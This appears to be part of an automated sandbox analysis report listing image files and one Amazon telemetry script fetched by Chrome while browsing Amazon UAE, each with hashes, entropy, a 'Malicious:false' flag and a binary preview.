                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 124x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12572
                                                                                                                                                                                                        Entropy (8bit):7.964301461677307
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:b+uUlAv59TBcZ41XY9yj+NGiAME5nGbxduZ7aNlN0aHv/NnZ7gTadb:bBUlABM9yj+UiE5QduZ+7NbddgTEb
                                                                                                                                                                                                        MD5:7F8E94D18856011D2D7A73C38C71279D
                                                                                                                                                                                                        SHA1:FD2AE1846458997339991DF4FAADB8EE0AF1A7D8
                                                                                                                                                                                                        SHA-256:5AF9B67F8510C873D5AC4FEBF093CC43CDDD36CB5C57342CF445A684EA099F4C
                                                                                                                                                                                                        SHA-512:85407D2E574B8DB7E3F0774D6265D0FBB6DDE6A59FED2255C41AD3B203E50CF8773C28165EAEBF87EE6A42CF6F8E75B0FFB83BC9592B103646C1AA76A722AB1E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........|.."...............................................................!..1"A..2Q#Baq3...S...Rc...$4r....Cbdtu......................................................!1.A.Qaq.."2....#....Bb..............?..K.Oi.jk.k..<53...A..,.*}._..7N....-....z.....W.....u.[D.T.m..A]N..b5..*.p...#."....v<[..ku+3.@....>...........c.C..A........v-.7.8..2....;`...x#\......7]./j.:..!.H`uK.!M.$j....t...q.....'..<.S.{....>....`..........{@.....G<..}..`.....9...y..].2 1...!AQ..r......U.~..ze.U.NV...N.G6X.F..A`.M$..I\G...).....9......u.....?y_....6...U.WE<..1O7.&e.Hn......gRq.....s.^...9o.s....C..p...Pm..>...F..}...G...k.x..........d.r-..rO....s..E...}_.?..j...Q.<w_...~..^4.".......?p9.r4k......x.......&..FG..}\8..]]A.=O.(~.._.y.....>Z..$?...G<.~N...GM.L.se....h.n96~.>.Cc.#YDs.b..d...-....}.>...5...3..w.-u.H.......{
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 173x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5994
                                                                                                                                                                                                        Entropy (8bit):7.932454865180586
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TBPjYyaR49ufNA19l+PM3e3qn91QVuDD0kiU51EbMDh1GSJDkNm/EAR8N6WSZnc3:5jY3QufNA1j+PMO6n91QOD0vU51TLGIA
                                                                                                                                                                                                        MD5:1D7CDC757680BCAC8C1AA646EB9C2064
                                                                                                                                                                                                        SHA1:A6AF28D867F3963341F89A5B2CF8A6FBF75F7157
                                                                                                                                                                                                        SHA-256:B536A0BEC12207832091E68BDB62BF981BCB48DA2B21217F78212F7960B86C89
                                                                                                                                                                                                        SHA-512:B603531B04A83DDF8B94DE409583CF4BB2AE2F199ED29939E4C88D064D36D57E628892DB5EDD75EA2E9AC3944DBCF460AE51B9643693524A8559F40C1B949AF7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1Q."6Aaqs...2.......#3Tr...BCDRS.....EUb.....%5c...............................................1Q....!S..ABa..............?..t.(..(..(..(..(<.Q../....m.-.e.$*..C..(..&.>.u.=......M!...;E.....y..;3"V...Q.4...y$.2.z.P...h,.{;.(t...#.F...1...s...M.]N.....N3..pG-...]".s.......S.....,.o."..w.~+...u.....#7iU.O%^x.".R....q.E...<3j...p...O..i*FE........O.Wzq^.....~.......j...d.....pw.~....qF.Y..9......w.WC....y..>..W.~.'..C...E........v..2j2.~..l.<.,..?.D...)~.5.2.<s'....]6...%CU..8.D...l......xP.{Y...}y...Ak;>.aq..Kk..*F.....E....0O0=../..Q...5+='..n.n.C.#....XM................8".Al....<.....I.'...J. .?.I.p..<...U.....x.)@.)@.)@.)@.)AR.. ..ku........P.1l#..%H.........b..sx...w....C3...|..'..?Ej......W....s......7.-.F}D.;...S.5I
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 168x226, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5072
                                                                                                                                                                                                        Entropy (8bit):7.907748653614744
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T/vY5ebLwWl2LCY+d+PYzgoGjJ6YVbln8QJngeSBJRZDwXxDx6e6I3taEslgDcaK:DbLw7tnP6md68n5JngeoR2hDxQ2FslBZ
                                                                                                                                                                                                        MD5:28B10CADED57957B943FB41146B637D7
                                                                                                                                                                                                        SHA1:6772D9A09A99E66A01B24BD10DA257C3C3647B89
                                                                                                                                                                                                        SHA-256:C0F801ADB4BCEAAD18C9E0EAFE04954C40C5660E67EA358E79B29C5878F5B8A2
                                                                                                                                                                                                        SHA-512:6FADAC96B061A21A7086BC2564CA0834725B930934E1CBE46A908AAEBAEE190EF927CCFEAC78EB3283576F3A86007555E7453DA4724B454E68103C6A4EA5F71E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/619NJGBXTvL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizonte"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."............................................................!...1AQ..."aq2R....%Bbrt...#3S...4CT....$...5s................................................!...1...2A"#Qa..............?.....e..d..K.I.^}...w..K...8...Y...&.........2..6.u^_...pu.....G..h..z.....,.A...2..vs..'....M.o.....b].|..f.b..2..z&...Z(.s<..F{<.1..*.L...8.:3|o..S....\..kwZ.......Hiz9.3...W.K..?....^.EC.r..SU)lq.E.3..7J.f....O.9:e.{t..u...(0|..^...{.........Km2...>......3......v.6...../.5.......t<....=h^...o.'q3qrmv.,..K.U0...I.Z....ZZ..6p.7..4=)B..!.B..B..B.h.Y..q.x.....D...:c....ELF.7..q..>...*.)C ..4/....X.`.b..J.D..c.L..]...:....q..J.%&H..i..Q2fnKU.9..........n...o......{dG=Vu...X.+.ce...3..E..4kn.%..pb14|..B ...Hdi..+..~...g.x..G&.....].!..< ...1.,""..F. ..)2=-B....!..!..!.....:.,q.^..V.-#..M9.7._....R.b.L .M.Kn..a[T.6..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3097
                                                                                                                                                                                                        Entropy (8bit):7.796732921016361
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:/85mpc2BJWJDMOX3U3Ju8DMvvH/njc2WRiMqZTSf57Pn35fpHsub9:/86c2mp9HU3OvHjcxRaNSfRJfVJ
                                                                                                                                                                                                        MD5:D6CDF967FF56E4FC4101417898604FB3
                                                                                                                                                                                                        SHA1:3C5502DAB48481B09937CB2FC2911D98375B9ACD
                                                                                                                                                                                                        SHA-256:AAA083549A0B0892E4E3521D3480FD10CAE51F41B7B995B7D36C78C799D97A0E
                                                                                                                                                                                                        SHA-512:0C0D5CC3815D8FF7BF93B4BF2BE42C8E5E3B0A2B0FEB1D73B909189382989C7F0EE762285AB232A29362CE34A07F299FAA5E46D6F6AB4B2852BC48404E888FAF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5.......................................................................|.D..~..........#1...:.L...X.7v3E............|*.3#].........UlV.#rs...v.............zF.,w.".....lno.....Vr...l:/...N.a........~...O..zS9....:.........).J.~d...(........G...+......'..s.k._[...^..^..n.Y.5&.....>...n.Z..y...o...Ob....y{..Nt4..0..............@............................!1AQ."02aq..@RrBb.......$6CDsu............?......?%..gn....Y..l...k.>\.S/.!.......B...#..x..0=.....R.d8..Gt....A.....~..p..-...Z....O.~.8.,..P.SJ..W...iWP..g.p~I.,..#.....2.l..>>.rj."I.D..].*`.*q .E$.......>S.E..,...d..N.U.....%0R..]R.....W.A....r$..H.Y)...~...[...2.......V....9......r.W%y..U:.`..,....N.Tn...o....x.9h..70..qQ-.K].4.S..Tv8..C....X5.y......+...((+....;..G.k...H"......5...4..#.P...........m.i..w.....&..no....p.%@
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3373
                                                                                                                                                                                                        Entropy (8bit):7.858268350620121
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tm2bxYlbf6ok/SE341jOU0AFwirnwecR2ZD0wQZHbx:TbxGf6cE4OU0AFwOn1u2xnEbx
                                                                                                                                                                                                        MD5:895459638269340C19DFE8BE786F1EC5
                                                                                                                                                                                                        SHA1:18374B7F5E258EAD08B6718F2B77A9E89089563D
                                                                                                                                                                                                        SHA-256:01D4AFFB6C5B35D6B44C0832776CE7EA74A8DE646CA5D9429223CD67CFB86BBB
                                                                                                                                                                                                        SHA-512:D27D8F58C26AD6E659780C62DD402D4409F40EEB46DAE42AF8EB3D8A30018F6030B9FB3E94FAF8058BB13A0C209D7FC58A346BFE75BFB059A8411146AF053257
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/TVs/Feb_Smart_1x._SY116_CB659039472_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1..AQTa..."q....#r......2BCR.$.Db...............................................!...1...AQRq.."2..B3Car..............?...B......!.!.@.B......!.!.@.B..Rm&....h.L..,...M.Z6......9i..3X...../w.....'7.~.%..#Iwo.'w..M....(..S...)c..EF.J. ....|....x..w...u.M...i...0....U...[P.F../.<...b....$.....VH..W)....Rx..91f..V..o........==..mK....G.+\....)@.........o.........8=4U.8....*..~r..2.dN.o...|.}..C..Egc..W..J.....8.n...8U....3_z./..;..y.=2.vH..I...7[......[.|..C..."./3.'o......rR:G9y....C.~K^..r../.c6'o'.:.i....D]v.M..3.|..r.s.?.../6.aZQ.#...Z..*.-AW...[;.Va.2l..Il..?..&....IV.Q=...6.....\.INxf........b..=...A.......30..>.....745......PK..n..H0.E.p...Zn#x<A......8..C.#.G~..nor......vR.q ..Lzl.+..,..9......7...u...6...c.......|.;...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (506)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1897
                                                                                                                                                                                                        Entropy (8bit):5.295537930728398
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:DxGQO2Vkgw6yp34Ih/Z/UD6B9zexGqpUDIRtVKn0FP0I2:DxG52VkgwtA6TeoIRDE0SI2
                                                                                                                                                                                                        MD5:84FC07603C6B7D7C8A4DEA1951AA3F51
                                                                                                                                                                                                        SHA1:81D1C249A0A70129C96F8111ABCFCB3E62F2F4ED
                                                                                                                                                                                                        SHA-256:1E90436DD878AC44E6868965D8DD7FFA194CBA607D31B83FF21CB31D48A70DF0
                                                                                                                                                                                                        SHA-512:1139A5C5A64AB3FB74832ECA3087D0A9E9C9277473A9FAC6156D03C43AB058F81C55F3C828273604E0F48C4290ED6AA538D8D53127CAE7F29D574E2AED34D422
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(c){var b=window.AmazonUIPageJS||window.P,f=b._namespace||b.attributeErrors,e=f?f("PerformanceResourceTimingAssets",""):b;e.guardFatal?e.guardFatal(c)(e,window):e.execute(function(){c(e,window)})})(function(c,b,f){"use strict";c.when("performance-resource-timing-utils").register("performance-resource-timing",function(e){function c(a){for(var h={},b=0;b<a.length;++b){var d=a[b],g=e.determineType(d.name),c=d.duration,m=d.responseEnd,k=d.transferSize||0;d=k/1024;k=0===k&&100>c;var l=h[g]||(h[g]=.{});g=function(a,b){l[a]=(l[a]||0)+(b!==f?b:1)};var n=function(a,b){l[a]=Math.max(l[a]||0,b)};g("requests");g("requests"+(k?"-cached":"-uncached"));g("total-duration",c);n("max-duration",c);g("total-transferred",d);n("max-transferred",d);n("long-pull",m)}p(h);return h}function p(a){for(var b in a)if(a.hasOwnProperty(b)){var c=a[b],d=100*(c["requests-cached"]||0)/c.requests;c["cache-hit-rate"]=d;c["cache-hit-rate-bucket"]=10*Math.ceil(d/10)}}function m(a,c){c=c!==f?c:1;b.ue&&b.ue.count&&b.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5485
                                                                                                                                                                                                        Entropy (8bit):7.841830052644104
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TLqCF96Mqe+d3QqfEdel2yKhjg6htwPg3vIveC1Wv2Sc37O7UHxg2o1IaY:/qCF96pe036delW3wI/IvRckSIihIF
                                                                                                                                                                                                        MD5:7E06B97905EC646EBBB8550B8EA70E2A
                                                                                                                                                                                                        SHA1:9CDE550A7CFD94EDDCBF3D945A2200D2325750D2
                                                                                                                                                                                                        SHA-256:DEF11D4CE7F5EF90C6EA67B3966FCA1E15B9DFC239FDB963592AFD01E417428E
                                                                                                                                                                                                        SHA-512:870D8D2FCD228EE50268CF71756E7BA793C1010C996D45A82497A23924D5E7986B49B25E49FF1053DA09DF2E249BE90ED40C2EA00103179DE36302B14B1D13C7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/41MgROdin7L._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................,.......;.x.......................'...:..............Qd.,~y..Oax._I....[..m....k .......n.^7)..-..$.5...$.|...\......n"j...9.=..&z..\53W.L.*]..@;......#..c..N]$#.....J=I5.X.X.$....u............N..e.t.....&V.IzM..7....."cS.^.....4+5.`.q.^....q.rW....\u.S.rT.vJ.&Z..~....zx..y...:...4..6..=#.3G...'..w/..^s..;n]e+r)[.E.-\-.;M4..W..>5.|O>..>.....<.^..}.M..O.u..t......5...t..X7.k.M.*.....B^...5:...C..1../.x...n>.V......H....>..{4......f:....cd.......5:A..K..su..`......c...F.Z]R&\.....`.s.....I$T.E.A.:!..o../#.k..vg..........[K.j./.q...y>.}.q....z.x....>}......~....9.........B '..h..p.............-.........................!. .."01@2A$3.CBPQ...............G#.>.U.5{[..Uh....4......`.fv..X.......=~......._...H..}_.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26csmtags%3DendVL%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8132
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 284x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11514
                                                                                                                                                                                                        Entropy (8bit):7.94133492653697
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:N8oC0JKIk9VqeJXDo9QHeNbHEH8WJYgE0+BUg22zWb/863aMW7deH0se:NDaVN6ONJYg8BUCqb3OdeHde
                                                                                                                                                                                                        MD5:1E70985462327FEC4E3599703EE3F6BE
                                                                                                                                                                                                        SHA1:649EE1AE913A6DE0C458AAC09BB3EE985953B6AB
                                                                                                                                                                                                        SHA-256:125DE6339749A555C83FB652E1C3DF77A866628DC53A8B34FE59A8248510B078
                                                                                                                                                                                                        SHA-512:482BEF98D7EDE4476994F675D0D4AC4CE749910C6123343B66623C8515A7BA479E39558D36AA501EA72DA17A8DB26E375E18F0D33D2BC9DE6C6C9D2DC4F14115
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51Gz7IimgoL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6..........................................................................1..h....ej..-.n...sc\m.s.P...d.v...k+r.h...h5.}..t.M*z.s....z..9.[...a3.:....k.0...].f\...7.M.DX\5h';s..........^5%...}......~4....%^...R.....Uo.:G........Yk_...n.0......bU...C.&.....Mn/4............cgS.r.|.r..zy..f..I.5'rE&4.O..-lU..].ku...q/.o..D....._..8{.r6..=9jtS.p..%..........R.s........ef5.q.....1&.....5...X....A.=..kgt.._.$..[.x.._F>p}..V...._5..Q..sL._........v...,..s.x.L.N.3......~|..v......>..k....+.E...[.r...)6WS.~..=......U}".....\_=~.|....k9Uw..O..:6...Q..Z+.i.p...<.v...d.bi0.....2.U.#......R.c....z...A.tSFn..:....FX[&..>...+....J,......uY/q.w.."a|O........8..K..$.bVp .mA.^t..E..N.h....O.G}<iN.7z.bx.3.jZK%...........H.p}........Jl.M0..8.V...}.....[......4...F.$..7....-..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):58623
                                                                                                                                                                                                        Entropy (8bit):7.875674719603265
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:4nld8BxE38orvWzvy8GzMZ0XzKoUgpeObmSzraJypu:4zDnrvAvy8GzI0XD/plzWJ6u
                                                                                                                                                                                                        MD5:8ABD97978296C8EEE78E3744E858E309
                                                                                                                                                                                                        SHA1:E9F3986067AFD3149BA8ADF97DFFA6E3F739943E
                                                                                                                                                                                                        SHA-256:40851D0EB9E79CC5F717AFD85A828D581AA039E6D4D537A1F0E65AD3EE39932A
                                                                                                                                                                                                        SHA-512:189FEA09812555CD30855F3A76B8FA5A8D9DDA085D9ACF56867F90038304EEE5163CD82345EA32D6EA6CA381A7B3F85BA0ACF8C15975A3EF318E63F3525AD421
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/51dtNa41nuL._SX1500_.jpg
                                                                                                                                                                                                        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2441
                                                                                                                                                                                                        Entropy (8bit):7.773716679132467
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r61rOKbc2K5kkPRnrNTikFkisV9ZYA8tjqwGCR1wEeAMl:TNS9PNrNJa9Z18tjqwL1wbl
                                                                                                                                                                                                        MD5:84F455E463BADC364DEB2B1E07029276
                                                                                                                                                                                                        SHA1:9B9C107A065BD2205DC26202F95DE1625CBE120B
                                                                                                                                                                                                        SHA-256:016BD6E354F64E55C11C0447C8DEFCB73F394573A52FCEC4D9C4FE99A7D3E67C
                                                                                                                                                                                                        SHA-512:54072A7C480FACF49A9BD72D7D233A57B82506AE56F9420F4A5462AED1120703CB6B9ABB17E8AC3A2B21B2A5D3FDAA7EA555A88E98777B7FDE9DA9707D10CA3E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Electronics/Store/Allelyn2022/BAU/xcm_banners_2022_mena_mobilemania_qc-372x232-product-badge-uw1qk_372x232_ae-en._SY116_CB608574221_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1...."3AQSqs....Ba#r.R..2Cc.....................................................!1."Qq....3Aa................?...>..UD..>....^MWv....n..-=.Z.y5].n/.rj..._.h..MWv.......7..Z G.U...G&..M.......wi......q~%..y5].n/.rj..._......Y..jQX..u.}X.8...|U..E..eG3.+...PK........wi......q~%..#...q~#.U...KD..j..._...wi.....<...7..95].n/.@.&..M...MWv...-.#...q~#.U...KD..*|...i.7EO...-.......?Ut...:...pY...}........D........q....$'$..p.b..U..."|7.xGo.r.2.bi..t'..h.u;...".i..N._E....R....[..x..c.i#.,sc.1&u.Z.-,..U.,9...F.f~...P..^`.Y..Z...C.kF}0Q.....].R......v=.....7.G+V0..;-?....l|.Nl..x[..OC_..9L.R..RN...U..../&e\VE.W..>...V. keq..f..K..j...C...8.......M2.....h.".p..).3.'.Nu......L...............7EO...-#.....%.""." 'U....y;(.F.>...*.G.k>..+...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 136 x 104, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5861
                                                                                                                                                                                                        Entropy (8bit):7.941819196061047
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:s5LS1YmLYIid4UFrn782yy57rQflsr4971/SauFVE26HrKYz0L/aw8oBXMZc1gXx:UEYYYIidFR78MnQ9C4971Sx/6HGYz+/6
                                                                                                                                                                                                        MD5:661F95800A801676A279D066C3C8114E
                                                                                                                                                                                                        SHA1:C495A9B59AFD9B35A08C12513D40B8C7E7771499
                                                                                                                                                                                                        SHA-256:849C8F9A22736A09D7C0C7981842D932777B5A0056CBA7DF41997C49D536225D
                                                                                                                                                                                                        SHA-512:A42EC4D0051537ED8B7BD27150E4FEA8F688C3B5FF6FAB2EF03B64492DE8033517AE019F72855102BE5F4405E537A5600F987331B2B2D30F81F37FEB251FFB03
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......h.....*.......gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 74x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3380
                                                                                                                                                                                                        Entropy (8bit):7.8866682294067845
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TJVlKHwoLbwLwjqsMcgErtLXe9B1vLF+bDk:7Ews8LUAEBLu9Hv5ow
                                                                                                                                                                                                        MD5:46A59D173B0DAE5CEBAD7C2B12712532
                                                                                                                                                                                                        SHA1:A71DEE95B28FE98A5EEBE79B89360F6C28F638A9
